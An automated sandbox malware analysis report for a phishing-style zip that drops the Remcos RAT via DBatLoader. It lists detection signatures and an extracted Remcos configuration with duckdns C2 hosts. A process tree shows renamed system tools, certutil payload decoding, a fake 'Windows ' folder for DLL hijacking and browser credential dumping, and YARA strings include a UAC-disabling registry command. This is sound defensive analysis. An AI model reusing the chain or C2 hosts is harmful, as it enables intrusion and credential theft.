Edit tour

Windows Analysis Report
WATER TREATMENT PROJECT.zip

Overview

General Information

Sample name:	WATER TREATMENT PROJECT.zip
Analysis ID:	1638153
MD5:	76196e5e8da8927afe142ecc98cf57c4
SHA1:	f28ce2a9c332468f31112ad580fdedd14ac1ac30
SHA256:	5d5712ca753bdf109dc9851b2243a6bfc049f7f279c4e34fb625a5a95b210aae
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates a thread in another existing process (thread injection)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Creation with Colorcpl

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Rundll32 Activity

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64_ra

rundll32.exe (PID: 7008 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 1844 cmdline: extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 3308 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 6664 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 6668 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" MD5: 41330D97BF17D07CD4308264F3032547)

alpha.pif (PID: 3708 cmdline: C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

ghf.pif (PID: 5112 cmdline: C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.pif (PID: 3656 cmdline: C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

ghf.pif (PID: 6528 cmdline: C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.pif (PID: 1904 cmdline: C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 4920 cmdline: PING -n 2 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

rdha.pif (PID: 6876 cmdline: C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF MD5: EF3179D498793BF4234F708D3BE28633)

ANYDESK.PIF (PID: 1944 cmdline: "C:\Users\Public\ANYDESK.PIF" MD5: DA20D0A19FBFFC10A2FA9D5A7F2E77D0)

cmd.exe (PID: 72 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 1880 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

alpha.pif (PID: 3236 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 2332 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 1572 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 3220 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)

colorcpl.exe (PID: 4452 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

recover.exe (PID: 5072 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 5092 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 4592 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 3992 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 4228 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 1568 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 5724 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" MD5: D38B657A068016768CA9F3B5E100B472)

cmd.exe (PID: 788 cmdline: cmd /c exit /b 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 4516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 5776 cmdline: extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 4960 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 4684 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" MD5: 41330D97BF17D07CD4308264F3032547)

expha.pif (PID: 1688 cmdline: C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" MD5: 41330D97BF17D07CD4308264F3032547)

alpha.pif (PID: 5056 cmdline: C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

ghf.pif (PID: 5332 cmdline: C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.pif (PID: 5400 cmdline: C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

ghf.pif (PID: 5992 cmdline: C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.pif (PID: 404 cmdline: C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 1544 cmdline: PING -n 2 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

rdha.pif (PID: 6324 cmdline: C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF MD5: EF3179D498793BF4234F708D3BE28633)

ANYDESK.PIF (PID: 6248 cmdline: "C:\Users\Public\ANYDESK.PIF" MD5: DA20D0A19FBFFC10A2FA9D5A7F2E77D0)

SndVol.exe (PID: 6808 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)

cmd.exe (PID: 6104 cmdline: cmd /c exit /b 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["baddieszn.duckdns.org:5200:1", "bahadii.duckdns.org:2500:1", "conquer25.duckdns.org:2404:0", "unforseen.duckdns.org:2404:0"], "Assigned name": "WE GO AGAIN", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-14MUP4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000001A.00000002.1844718324.000000000256F000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c7e6:$a1: Remcos restarted by watchdog! 0x6ce36:$a3: %02i:%02i:%02i:%03i
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: ANYDESK.PIF PID: 1944	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: colorcpl.exe PID: 4452	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: colorcpl.exe PID: 4452	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: recover.exe PID: 4564	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: SndVol.exe PID: 6808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: SndVol.exe PID: 6808	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: SndVol.exe PID: 6808	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: SndVol.exe PID: 6808	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xe548:$a1: Remcos restarted by watchdog! 0x1d4ce:$a1: Remcos restarted by watchdog! 0xeb9d:$a3: %02i:%02i:%02i:%03i 0xefda:$a3: %02i:%02i:%02i:%03i 0x1db23:$a3: %02i:%02i:%02i:%03i 0x1df60:$a3: %02i:%02i:%02i:%03i
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.3.colorcpl.exe.2ef626a0.5.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
26.2.ANYDESK.PIF.256fc48.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
62.2.SndVol.exe.6831a8e.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
62.2.SndVol.exe.6831a8e.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
62.2.SndVol.exe.6831a8e.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
62.2.SndVol.exe.6831a8e.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
62.2.SndVol.exe.6831a8e.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
62.2.SndVol.exe.6831a8e.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
47.2.recover.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
62.2.SndVol.exe.6831a8e.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
62.2.SndVol.exe.6831a8e.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
62.2.SndVol.exe.6831a8e.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
62.2.SndVol.exe.6831a8e.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
62.2.SndVol.exe.6831a8e.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
62.2.SndVol.exe.6831a8e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
47.2.recover.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
62.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
62.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
62.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
62.2.SndVol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
